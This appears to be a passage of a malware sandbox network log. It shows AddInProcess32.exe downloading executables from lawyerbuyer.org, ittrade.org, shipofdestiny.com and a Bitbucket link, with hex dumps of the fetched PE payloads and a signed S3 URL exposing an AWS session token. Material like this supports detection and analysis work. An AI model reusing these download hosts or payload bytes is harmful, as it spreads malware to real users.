cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.031881
                                                                                                                                                                                                                                                            x-usage-system-time: 0.000842
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            x-served-by: ddcd3d4e054b
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 68
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: b9e31946e4f87466
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.055806875228881836
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3915
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            45192.168.2.555621104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC110OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC680INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 3
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5axO7kCBZJTyNjcxcFJPBF5nrUJ7AneexTOuqaopuVC%2B8f9zenpn2Cc3zmgS%2BPlrNBIfAqsem2LRraUJZXh%2FNZRDpuHoUmwzRbRKTekp0qMjHZXNhzZbvYRI9un9FVpD2ts%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202ecb9b09ed-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC689INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85
                                                                                                                                                                                                                                                            Data Ascii: jju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            46192.168.2.555606104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC705INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CoQcpvm1gL5IlJSXjptvQNiZC%2Fd4iiS7L46c16j3Efx2OHJdcMT9GFH4jW0WqP3f%2BY3ieEU9dsOzf57FmbyFEgMMQFkg%2FCXPEA%2FAzpp%2BhfZwNUzF5G6NG3811OAqADg3Xyzp0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202e5ad00ad7-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            47192.168.2.555607172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC106OUTGET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC686INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 3
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NpTbYJfRA2NQon%2BFm4%2FuyWnK5lYul7lwlUvm16Aox3R%2BU4hOYQMkF3einR5R1zFB%2FoSQeGkE5UXa%2FuywUIqGlqS%2Bzo8d3XPJrSXF2hgifyZ9xveGBZP%2B02Elmxe9Dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202f3ebe0ad9-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC683INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 66 8c 15 b0 ee 80 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b
                                                                                                                                                                                                                                                            Data Ascii: ffff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
